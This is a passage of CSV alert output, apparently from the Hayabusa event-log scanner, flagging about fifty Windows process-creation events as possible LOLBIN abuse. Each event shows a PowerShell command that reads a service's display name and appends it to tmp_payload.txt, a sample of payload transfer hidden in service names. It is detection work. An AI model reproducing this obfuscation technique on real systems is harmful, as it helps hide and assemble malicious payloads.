+2021-11-03 17:38:50.742 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:55.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:55.114 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:56.538 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:56.554 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x470 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xabc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:06.713 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:06.728 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:11.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xed4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:11.124 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:14.049 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:14.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:15.496 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:15.511 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:19.854 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:19.869 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
